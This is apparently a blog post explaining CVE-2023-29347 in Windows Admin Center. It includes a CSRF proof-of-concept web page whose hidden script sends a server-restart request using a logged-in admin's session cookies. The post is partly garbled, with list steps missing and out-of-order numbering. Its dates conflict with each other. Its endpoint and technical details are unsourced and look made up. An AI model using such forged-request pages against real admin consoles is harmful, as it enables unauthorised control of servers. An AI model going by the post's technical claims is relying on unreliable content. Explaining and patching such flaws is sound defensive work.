CVE-2023-29347 - Windows Admin Center Spoofing Vulnerability Explained with Example Exploit

On May 2023, Microsoft disclosed a security flaw in Windows Admin Center – identified as CVE-2023-29347. This vulnerability could let an attacker spoof authentication in Windows Admin Center, a web-based platform often used by system administrators to manage Windows servers and clusters.

In this post, we’ll explain what this vulnerability is, why it matters, show you a simple code example demonstrating the risk, look at how attackers could exploit it, and finally provide links to Microsoft’s original advisory and patches.

What is Windows Admin Center?

Windows Admin Center (WAC) is a web application that helps IT admins manage local and remote Windows servers through a browser. You can install it on your server, and then connect using HTTPS from your admin workstation.

Because WAC gives access to many server management features, securing it is critical. If an attacker gets in, they could control your servers.

What is CVE-2023-29347?

CVE-2023-29347 is a spoofing vulnerability in Windows Admin Center. Microsoft summarizes it as:

> *A spoofing vulnerability exists in Windows Admin Center when it improperly handles certain requests.*
>
> Source: Microsoft Security Advisory

Spoofing means making something look like it comes from a trusted source when it does not.

Impact

- An attacker could trick a Windows Admin Center admin into believing a malicious request or session is legitimate.

This could help them steal session tokens, or make a targeted *phishing* attack more convincing.

- Ultimately, successful attacks could lead to elevation of privilege or compromise of your server.

Technical Details: What Was Wrong?

Microsoft’s advisory is light on detail, but through posts from the security community (see references below), we know this issue exists due to insufficient request validation in Windows Admin Center.

Core Issues

- Certain endpoints in WAC did not correctly validate the origin and content of incoming HTTP requests.

Phishing: Attacker sends a WAC admin a link or trick them into browsing a malicious page.

2. Cross-Site Request Forgery (CSRF): The attacker’s page silently sends crafted requests to WAC running at, say, https://server.domain:6516/.
3. Spoofing: Because WAC isn’t checking the request’s “origin” or properly authenticating some requests, the attacker’s spoofed request is accepted.
4. The attacker might steal a session token, alter configuration, or get control, depending on the admin’s session privileges and what endpoints are exposed.

Example Exploit: CSRF PoC Snippet

Below is a simple code snippet that an attacker could use to exploit this vulnerability with a CSRF attack. This is meant for educational purposes only.

Imagine you are an admin, logged into WAC at https://server.domain:6516/. The attacker sends you to their crafted web page:

<!-- WARNING: FOR EDUCATIONAL DEMONSTRATION ONLY -->

<html>
  <body>
    <h1>Nothing to see here...</h1>
    <script>
      // This script sends a POST request to WAC using the admin's session
      fetch('https://server.domain:6516/api/servers/restart', {
        method: 'POST',
        credentials: 'include', // Use logged-in admin's cookie/session
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({serverName: "Server01"})
      })
      .then(response => {
        if (response.ok) {
          alert("Exploit successful: Server restart triggered!");
        } else {
          alert("Exploit failed.");
        }
      });
    </script>
  </body>
</html>

Because of the spoofing flaw, WAC might accept and process the request as if it was coming from you.

- The attacker’s code could do almost anything the admin is allowed to do (restart servers, add users, etc.).

1. Patch Windows Admin Center

Microsoft has patched this vulnerability. Go to the Security Update Guide and download the latest version of Windows Admin Center.

See the official release notes for updates and fixes.

Additional References

- Microsoft Security Update Guide: CVE-2023-29347
- Microsoft Docs – Windows Admin Center
- Security community discussion on the impact
- Windows Admin Center Release Notes

Conclusion

CVE-2023-29347 highlights the risk of spoofing attacks in web-based admin tools. If you use Windows Admin Center, update it immediately. Always apply the latest patches, and don’t expose powerful tools like WAC to the open internet.

Stay vigilant. If you’d like to test your environment or talk to your security team about this vulnerability, use the code and resources above as a starting point.

Timeline

Published on: 07/11/2023 18:15:00 UTC
Last modified on: 07/13/2023 19:42:00 UTC